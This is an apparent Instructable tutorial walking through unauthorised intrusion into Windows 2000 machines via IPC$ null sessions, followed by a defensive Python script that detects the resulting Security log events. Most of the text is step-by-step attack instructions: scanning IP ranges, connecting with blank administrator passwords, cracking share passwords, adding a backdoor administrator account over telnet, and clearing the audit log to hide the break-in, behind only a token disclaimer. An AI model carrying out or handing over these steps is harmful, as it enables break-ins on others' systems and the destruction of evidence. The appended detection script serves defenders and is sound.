Introduction: Hacking a Windows 2000 System Through IPC$
This Instructable about hacking is just for educational purposes (or good), not for malicious deeds. It's not advisable to perform this Instructable. It could be dangerous. Again, this is just for educational purposes.
Before starting, you need to be running a Win2k system and have the following tools:
Superscan version 3.00 by Foundstone (246KB)
NetBrute Scanner (247KB)
PQWak V1.0 (24KB)
Step 1: Scanning for Open Win2k Systems
1. Open SuperScan 2.05 (Port scanner)
2. Select an IP range
3. Check "Only scan responsive pings" and "All selected ports in list"
4. Only scan ports 139 (NetBIOS), and 1025 (Network Blackjack)
5. When a system with both Netbios and BlackJack is found, open NetBrute, and scan that IP to see if there is an IPC$
Step 2: Connecting to the IPC$
1. Open a DOS window
2. Type in: net use \\ipaddress\ipc$ "" /user:administrator
3. If you connect to the system, it will say: "The command completed successfully."
4. If it says bad username or password, try running PQWak.exe to crack the share password. Then insert the password like so:
net use \\ipaddress\ipc$ "password" /user:administrator
5. Users usually have only one password for everything, so try the c$ share password as the administrator password to connect to the IPC$.
Step 3: Connecting Using Computer Management
1. Open Computer Management.
2. Click Action, then Connect to Another Computer
3. Type in the IP address.
Step 4: Creating User Accounts and Adding Them to a Group
1. Open a DOS window, and type the following: telnet IPaddress
2. If prompted for a username and password, type Administrator with no password.
3. To create a user account, type the following: net user username password /add
4. Replace username and password with whatever you like.
5. To add the user account to the administrators group, type the following: net localgroup administrators username /add (local group) or net group administrators username /add (domain group).
Step 5: Covering Your Tracks
1. Open a DOS window, and type the following: net use \\ipaddress\ipc$ /delete
2. While still connected through Computer Management, check in Event Viewer whether the Security Log is being audited. If it is, clear it.
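Every step above leaves a trace in the target's Security log when auditing is enabled: an anonymous network logon for the null session, an account-creation event, a change to the Administrators group, and finally a cleared audit log. As an added example (not part of the original Instructable), here is a small Python script a defender can run over an exported log to spot that sequence. The CSV layout and the log lines are constructed, and the event IDs are the legacy (pre-Vista) Windows 2000 Security log IDs as assumed here; check them against the log of the system you are reviewing.

```python
import csv
import io
from collections import defaultdict

# Constructed sample: a Windows 2000 Security log exported as CSV with
# columns record,event_id,user,details. Not a real capture.
SAMPLE_LOG = """record,event_id,user,details
1,540,ANONYMOUS LOGON,Logon Type: 3 Workstation: ATTACKER
2,540,ANONYMOUS LOGON,Logon Type: 3 Workstation: ATTACKER
3,624,Administrator,New Account Name: backdoor
4,636,Administrator,Group Name: Administrators Member: backdoor
5,517,Administrator,The audit log was cleared
6,540,jsmith,Logon Type: 3 Workstation: WS01
"""

# Legacy (pre-Vista) Security log event IDs, assumed here; verify them
# against your own audit log before relying on them.
NETWORK_LOGON = "540"             # successful network logon
ACCOUNT_CREATED = "624"           # user account created
LOCAL_GROUP_MEMBER_ADDED = "636"  # member added to security-enabled local group
AUDIT_LOG_CLEARED = "517"         # the audit log was cleared


def analyse(log_text):
    """Return (kind, details) findings matching the IPC$ abuse pattern."""
    findings = []
    for row in csv.DictReader(io.StringIO(log_text)):
        eid, user, details = row["event_id"], row["user"], row["details"]
        # A null session shows up as a network logon by ANONYMOUS LOGON.
        if eid == NETWORK_LOGON and user == "ANONYMOUS LOGON":
            findings.append(("null_session", details))
        elif eid == ACCOUNT_CREATED:
            findings.append(("account_created", details))
        elif eid == LOCAL_GROUP_MEMBER_ADDED and "Administrators" in details:
            findings.append(("admin_group_change", details))
        elif eid == AUDIT_LOG_CLEARED:
            findings.append(("log_cleared", details))
    return findings


def count_by_kind(findings):
    """Summarise findings as {kind: count} for a quick triage view."""
    counts = defaultdict(int)
    for kind, _ in findings:
        counts[kind] += 1
    return dict(counts)


if __name__ == "__main__":
    for kind, details in analyse(SAMPLE_LOG):
        print(f"{kind:20} {details}")
```

A cleared-log event with no other findings before it is itself the strongest signal, since the clearing removes the earlier evidence.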